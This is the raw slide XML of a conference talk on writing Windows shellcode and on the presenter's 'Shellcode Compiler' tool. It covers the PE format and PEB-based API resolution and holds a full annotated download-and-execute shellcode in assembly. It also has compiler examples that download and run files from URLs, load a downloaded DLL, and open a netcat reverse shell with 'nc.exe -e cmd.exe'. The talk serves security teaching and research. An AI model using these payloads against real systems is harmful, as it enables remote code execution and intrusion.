              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pP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MessageBox (user32.dll)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pP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Reverse TCP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bind</a:t>
            </a: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ro-RO" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateProcess</a:t>
            </a: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o-RO" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="20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9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269" y="225552"/>
            <a:ext cx="7930595" cy="640080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PE File Format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65632"/>
            <a:ext cx="9144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Portable Executable (PE)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format is a file format for executables, object code, DLLs, and others used in 32-bit and 64-bit versions of Windows operating systems. The PE format is a data structure that encapsulates the information necessary for the Windows OS loader to manage the wrapped executable code. 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45" y="1955161"/>
            <a:ext cx="5150110" cy="26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77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" y="818631"/>
            <a:ext cx="6850901" cy="446289"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>whoami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" y="1950720"/>
            <a:ext cx="81305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smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ionut Popescu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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Senior Penetration Tester @ SecureWorks (secureworks.com)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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Administrator @ Romanian Security Team (rstforums.com)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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Speaker @ Defcon 23 (NetRipper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> post-exploitation tool)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19708609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PE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80" y="883920"/>
            <a:ext cx="2626551" cy="40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0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MS-DOS header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7" y="883920"/>
            <a:ext cx="7479792" cy="373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46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MS-DOS header details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1488"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1475233" y="883920"/>
          <a:ext cx="6077711" cy="3343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Document" r:id="rId4" imgW="6099983" imgH="3356174" progId="Word.Document.12">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Document" r:id="rId4" imgW="6099983" imgH="33561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233" y="883920"/>
                        <a:ext cx="6077711" cy="334391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89237"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="105617" y="4328423"/>
          <a:ext cx="686211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482"/>
                <a:gridCol w="3949629"/>
              </a:tblGrid>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0"/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BYTE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– 8 bits (1 byte), “unsigned char”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/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– 8 bits (1 byte),  “char”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/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DWORD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–  4 bytes (32 bits)  “unsigned long”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–  4 bytes (32 bits) “long”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/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ULONGLONG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–  8 bytes (64 bits) “unsigned long </a:t>
                      </a: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”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WORD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 –  2 bytes (16 bits) “unsigned short”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611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header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4" y="883920"/>
            <a:ext cx="6783976" cy="36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244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header structure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47013"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="310134" y="938338"/>
          <a:ext cx="3164586" cy="15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586"/>
              </a:tblGrid>
              <a:tr h="1545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typedef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200" dirty="0" err="1" smtClean="0"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struct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_IMAGE_NT_HEADERS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Signature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IMAGE_FILE_HEADER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FileHeader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IMAGE_OPTIONAL_HEADER32 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OptionalHeader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IMAGE_NT_HEADERS32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*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PIMAGE_NT_HEADERS32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2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87809"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="584455" y="2579685"/>
          <a:ext cx="2652521" cy="2212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521"/>
              </a:tblGrid>
              <a:tr h="21751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typedef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struct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_IMAGE_FILE_HEADER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Machine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NumberOfSections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TimeDateStamp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PointerToSymbolTable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NumberOfSymbols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SizeOfOptionalHeader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Characteristics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IMAGE_FILE_HEADER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,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*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PIMAGE_FILE_HEADER</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="11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1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15315"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3639312" y="968055"/>
          <a:ext cx="5303520" cy="293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/>
                <a:gridCol w="2651760"/>
              </a:tblGrid>
              <a:tr h="27444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typedef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900" dirty="0" err="1" smtClean="0"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struct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_IMAGE_OPTIONAL_HEADER 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Magic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BYTE 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MajorLinkerVersion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BYTE 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MinorLinkerVersion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SizeOfCode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SizeOfInitializedData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SizeOfUninitializedData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AddressOfEntryPoint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BaseOfCode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BaseOfData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ImageBase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SectionAlignment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FileAlignment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MajorOperatingSystemVersion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MinorOperatingSystemVersion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MajorImageVersion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MinorImageVersion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 smtClean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MajorSubsystemVersion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MinorSubsystemVersion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Win32VersionValue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SizeOfImage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SizeOfHeaders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CheckSum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Subsystem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DllCharacteristics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SizeOfStackReserve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SizeOfStackCommit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SizeOfHeapReserve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SizeOfHeapCommit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LoaderFlags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NumberOfRvaAndSizes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9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IMAGE_DATA_DIRECTORY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DataDirectory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16</a:t>
                      </a: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lang="en-US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section table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6928" y="1179576"/>
          <a:ext cx="37338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</a:tblGrid>
              <a:tr h="304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804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#define IMAGE_SIZEOF_SHORT_NAME              8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 err="1" smtClean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typedef</a:t>
                      </a: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GB" sz="1000" dirty="0" err="1" smtClean="0"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struct</a:t>
                      </a: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_IMAGE_SECTION_HEADER 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BYTE    Name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[</a:t>
                      </a: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IMAGE_SIZEOF_SHORT_NAME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];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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF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union</a:t>
                      </a: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{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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1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PhysicalAddress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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1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VirtualSize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Misc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GB" sz="1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VirtualAddress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GB" sz="1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SizeOfRawData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GB" sz="1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PointerToRawData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GB" sz="1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PointerToRelocations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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1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PointerToLinenumbers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GB" sz="1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NumberOfRelocations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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1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NumberOfLinenumbers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DWORD   Characteristics</a:t>
                      </a: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;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 smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00008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}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="100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GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="804000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight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#define IMAGE_SIZEOF_SECTION_HEADER          40</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean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8" y="1179576"/>
            <a:ext cx="3429000" cy="30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594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directory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12" y="883920"/>
            <a:ext cx="3822192" cy="40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811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imports table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79" y="883920"/>
            <a:ext cx="6721902" cy="36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989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Environment Block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454" y="926592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_PEB {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-R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PPEB_LDR_DATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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o-R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// 0xC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o-R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PEB, *PPEB;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2207359"/>
            <a:ext cx="5715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_PEB_LDR_DATA {</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="16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o-R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LIST_ENTRY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InLoadOrderModuleList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LIST_ENTRY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InMemoryOrder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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List; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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// 0x14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LIST_ENTRY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InInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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ialization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OrderModuleList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o-RO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PEB_LDR_DATA, *PPEB_LDR_DATA;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5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kernel32.dll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574" y="1048512"/>
            <a:ext cx="8742426" cy="359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00000000  33C9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ECX = 0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00000002  648B4130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,[fs:ecx+0x30]  ; EAX = PEB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00000006  8B400C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,[eax+0xc]      ; EAX = PEB-&gt;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Ldr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00000009  8B7014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,[eax+0x14]     ; ESI = PEB-&gt;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Ldr.In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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Order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0000000C  AD  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lodsd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; EAX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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Second</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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module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0000000D  96  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xchg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eax,esi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; EAX = ESI, ESI = EAX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0000000E  AD  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lodsd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; EAX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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Third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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(kernel32)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0000000F  8B5810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,[eax+0x10]     ; EBX = Base address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00000012  8B533C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,[ebx+0x3c]     ; EDX = DOS-&gt;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e_lfanew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00000015  03D3              add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edx,ebx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EDX = PE Header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00000017  8B5278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,[edx+0x78]     ; EDX = Offset export table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0000001A  03D3              add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edx,ebx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EDX = Export table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0000001C  8B7220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,[edx+0x20]     ; ESI = Offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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ames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table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0000001F  03F3              add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esi,ebx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ESI = Names table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00000021  33C9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EXC = 0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83320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26169" y="1645127"/>
            <a:ext cx="7924386" cy="830580"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple prizes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270" y="259080"/>
            <a:ext cx="7930595" cy="640080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defcamp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7124" y="1202532"/>
            <a:ext cx="7934325" cy="366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CTF contest @ Hacking village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305214" y="3169920"/>
            <a:ext cx="7924386" cy="12420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400" baseline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 smtClean="0"/>
              <a:t>Largest security operations center from the Central and Eastern Europe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>Hiring on multiple security related positions: Penetration Testing, Information Security etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>Visit our booth for more information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern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26169" y="2727325"/>
            <a:ext cx="7934325" cy="3667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0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4675" indent="-2333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4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 smtClean="0"/>
              <a:t>SecureWorks is hiring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728707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GetProcAddress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270" y="883920"/>
            <a:ext cx="8687562" cy="402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00000023  41    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; Loop for each function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00000024  AD    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lodsd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00000025  03C3              add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eax,ebx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; Loop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untill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function name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00000027  813847657450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],0x50746547        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0000002D  75F4  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0x23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0000002F  817804726F6341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[eax+0x4],0x41636f72    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rocA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00000036  75EB  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0x23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00000038  81780864647265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[eax+0x8],0x65726464    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ddre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0000003F  75E2  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0x23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00000041  8B7224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,[edx+0x24]   ; ESI = Offset ordinals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00000044  03F3              add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esi,ebx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; ESI = Ordinals table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00000046  668B0C4E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cx,[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esi+ecx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*2]   ; C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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Number of function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0000004A  49    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0000004B  8B721C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,[edx+0x1c]   ; ESI = Offset address table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0000004E  03F3              add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esi,ebx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; ESI = Address table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00000050  8B148E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esi+ecx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*4]  ; EDX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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(offset)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00000053  03D3              add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edx,ebx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; EDX =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2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8402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LoadLibrary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150" y="1152144"/>
            <a:ext cx="8486394" cy="317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00000055  33C9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ECX = 0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00000057  51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00000058  682E657865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0x6578652e    ; .exe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0000005D  6864656164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0x64616564    ; dead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00000062  53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Kernel32 base address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00000063  52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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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00000064  51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0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00000065  6861727941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0x41797261 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aryA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0000006A  684C696272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0x7262694c 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Libr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0000006F  684C6F6164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0x64616f4c    ; Load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00000074  54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LoadLibrary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00000075  53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Kernel32 base address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00000076  FFD2              call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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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r>
              <a:rPr lang="ro-R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(LL)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292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 DLL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urlmon.dll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574" y="1578864"/>
            <a:ext cx="8614410" cy="251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00000078  83C40C            add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esp,byte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+0xc      ; pop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LoadLibrary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0000007B  59                pop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; ECX = 0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0000007C  50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; EAX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LoadLibrary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0000007D  51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0000007E  66B96C6C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cx,0x6c6c       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ll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00000082  51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00000083  686F6E2E64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0x642e6e6f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on.d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00000088  6875726C6D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0x6d6c7275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urlm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0000008D  54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;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urlmon.dll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0000008E  FFD0              call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o-R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LoadLibrary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urlmon.dll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241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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1"/>
              <a:t>function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smtClean="0"/>
              <a:t>DLL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1" smtClean="0"/>
              <a:t>URLDownloadToFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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726" y="1139952"/>
            <a:ext cx="8669274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00000090  83C410            add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esp,byte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+0x10       ; Clean stack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00000093  8B542404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,[esp+0x4]        ; EDX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00000097  33C9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ECX = 0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00000099  51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0000009A  66B96541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cx,0x4165         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0000009E  51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0000009F  33C9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ECX = 0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000000A1  686F46696C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0x6c69466f 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oFil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000000A6  686F616454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0x5464616f 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oadT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000000AB  686F776E6C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0x6c6e776f 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ownl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000000B0  6855524C44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0x444c5255    ; URLD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000000B5  54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URLDownloadToFileA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000000B6  50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urlmon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base address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000000B7  FFD2              call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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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o-RO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URLDown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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3748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err="1"/>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1"/>
              <a:t>URLDownloadToFile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270" y="930039"/>
            <a:ext cx="8614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000000B9  33C9  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ECX = 0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000000BB  8D542424          lea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,[esp+0x24]       ; EDX = "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dead.exe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000000BF  51        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000000C0  51        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000000C1  52        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"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dead.exe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000000C2  EB47             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short 0x10b          ; Will see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000000C4  51        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0 from 10b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000000C5  FFD0              call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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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Download</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO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ro-RO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o-RO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ro-RO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Will put URL pointer on the stack as return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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o-RO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ro-RO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0000010B  E8B4FFFFFF        call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0xc4</a:t>
            </a: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ro-RO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ro-RO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bflow.security-portal.cz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/down/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xy.txt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00000110  687474703A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0x3a707474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00000115  2F                das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00000116  2F                das </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPlain" startAt="117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62666C            bound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,[esi+0x6c]</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO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ro-RO" sz="12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62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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1"/>
              <a:t>function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smtClean="0"/>
              <a:t>DLL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1" smtClean="0"/>
              <a:t>WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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270" y="1103376"/>
            <a:ext cx="8541258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000000C7  83C41C            add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esp,byte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+0x1c       ; Clean stack (URL...)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000000CA  33C9    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ecx,ecx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; ECX = 0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000000CC  5A                pop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; EDX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000000CD  5B                pop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000000CE  53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; EBX = kernel32 base address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000000CF  52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000000D0  51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000000D1  6878656361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0x61636578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xeca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000000D6  884C2403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[esp+0x3],cl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000000DA  6857696E45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0x456e6957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WinE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000000DF  54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000000E0  53                push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000000E1  FFD2              call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WinExec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27714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err="1"/>
              <a:t>WinExec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ExitProcess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270" y="1036320"/>
            <a:ext cx="8193786" cy="365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000000E3  6A05              push byte +0x5          ; SW_SHOW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000000E5  8D4C2418          lea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,[esp+0x18]      ; ECX = "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dead.exe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000000E9  51        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ecx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000000EA  FFD0              call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; Call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WinExec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o-RO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5)</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO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ro-RO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ro-RO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000000EC  83C40C            add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esp,byte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+0xc                 ; Clean stack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000000EF  5A                pop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GetProcAddress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000000F0  5B                pop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; kernel32 base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000000F1  6865737361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0x61737365             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essa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000000F6  836C240361        sub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[esp+0x3],byte +0x61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000000FB  6850726F63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0x636f7250             ; Proc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00000100  6845786974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0x74697845             ; Exit        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00000105  54        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00000106  53                push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ebx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00000107  FFD2              call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edx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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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GetProc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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o-RO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ro-RO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00000109  FFD0              call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;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ExitProcess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2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197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1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think?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270" y="1165685"/>
            <a:ext cx="80830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It looks complicated to write a Windows shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN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…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But what can you do if you want to create a custom shellcode?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Learning assembler and Windows internals will not be easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN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…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Use Shellcode Compiler! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11421050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11" y="883920"/>
            <a:ext cx="4080598" cy="38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749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95275" y="1623060"/>
            <a:ext cx="2849880" cy="2606040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is Shellcode compiler?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is a compiler?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is a shellcode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Exploitation</a:t>
            </a:r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dirty="0" smtClean="0"/>
              <a:t>structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>limitations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5275" y="1012825"/>
            <a:ext cx="7934325" cy="366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will talk about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22420" y="1623060"/>
            <a:ext cx="2849880" cy="260604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  <a:cs typeface="+mn-cs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000" baseline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400" baseline="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200">
                <a:solidFill>
                  <a:schemeClr val="tx1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 smtClean="0"/>
              <a:t>Linux shellcodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>Windows shellcodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>Windows shellcode example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>Shellcode compiler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>More details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5503277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270" y="1382071"/>
            <a:ext cx="82714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MessageBoxA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("user32.dll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MessageBoxA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,"This is a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MessageBox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example","Shellcode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Compiler",0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(0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00135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and Windows Registry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270" y="1040043"/>
            <a:ext cx="849484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CopyFileA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DeleteFileA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CopyFileA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("C:\Windows\System32\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calc.exe","C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:\Users\Ionut\Desktop\calc.exe",0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DeleteFileA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("C:\Users\Ionut\Desktop\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Delete.txt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------------------------------------------------------------------------------------------------------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2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RegSetKeyValueA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("advapi32.dll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RegSetKeyValueA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(2147483649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,"Software\Microsoft\Notepad","Test",1,"Nytro",5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(0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  <a:endParaRPr lang="en-US" sz="1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967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Execute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424" y="1256427"/>
            <a:ext cx="7983441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URLDownloadToFileA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urlmon.dll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WinExec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URLDownloadToFileA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(0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,"https://rstforums.com/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fisiere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/calc.exe","calc.exe",0,0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WinExec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("calc.exe",0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(0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07279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shell (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc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270" y="1221526"/>
            <a:ext cx="8232596" cy="229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URLDownloadToFileA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urlmon.dll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WinExec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URLDownloadToFileA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(0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,"https://rstforums.com/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fisiere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/nc.exe","nc.exe",0,0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WinExec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nc.exe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-e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cmd.exe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192.168.0.100 1337",0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(0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  <a:endParaRPr lang="en-US" sz="18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534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and Load DLL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270" y="1179646"/>
            <a:ext cx="7778886" cy="21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URLDownloadToFileA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urlmon.dll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LoadLibraryA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("kernel32.dll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URLDownloadToFileA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(0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,"https://rstforums.com/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fisiere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/DLLExample.dll","SC.dll",0,0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LoadLibraryA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("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SC.dll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");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ExitProcess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(0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);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9919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9489" y="2073106"/>
            <a:ext cx="346215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5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15162891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61479" y="1099316"/>
            <a:ext cx="7924386" cy="2662986"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is not possible to use the return value of an API call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is not possible to use pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is not possible to declare variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It does not show warnings or errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It does not properly check for tabs and spaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It does not support arithmetic operators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It does not support hex strings or \x characters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969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WinAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> functions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5270" y="1067964"/>
            <a:ext cx="8425044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Windows API Index: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https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://msdn.microsoft.com/en-us/library/windows/desktop/ff818516(v=vs.85).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aspx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User Interface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Windows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Environment (Shell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User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Input and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Messaging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Data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access and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storage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Diagnostics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Graphics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and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Multimedia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Devices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System Services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Security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and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Identity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Application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Installation and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Servicing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System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Admin and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Management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Networking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and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Internet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charset="0"/>
              <a:buChar char="•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Deprecated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or legacy APIs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8593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vs Unicode on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WinAPI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504" y="1200587"/>
            <a:ext cx="8815933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Windows API functions that manipulate characters are generally implemented in one of three formats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 generic version that can be compiled for either Windows code pages or Unicode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 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Windows code page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 version with the letter "A" used to indicate "ANSI"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 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Unicode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 version with the letter "W" used to indicate "wide"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8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+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://msdn.microsoft.com/en-us/library/windows/desktop/dd374089(v=vs.85).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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>aspx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1028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270" y="1040042"/>
            <a:ext cx="8616504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Shellcode Compiler takes as input a source code written in a custom programming language similar to C/C++ code.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It uses DFA (Deterministic Finite Automaton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 to parse the source code and generates assembly code that avoids NULL-bytes after it is assembled.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It generates calls to each function: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LoadLibrary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(“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SpecifiedDLLs.dll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”)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GetProcAddress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(DLL, “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FunctionName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”)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FunctionName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(“Parameters”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4520478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21" y="1897588"/>
            <a:ext cx="6850901" cy="1495794"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shellcode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525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Shellcode Compiler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9698" y="1242466"/>
            <a:ext cx="7727029" cy="2880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GitHub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https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://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github.com/NytroRST/ShellcodeCompiler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8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You will find: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Source code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Binary release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Tx/>
              <a:buChar char="-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5596561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905" y="55840"/>
            <a:ext cx="2020753" cy="1106939"/>
          </a:xfrm>
        </p:spPr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405" y="1291329"/>
            <a:ext cx="8655389" cy="2709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>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Introduction to Windows shellcode development – Part 1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1</a:t>
            </a:r>
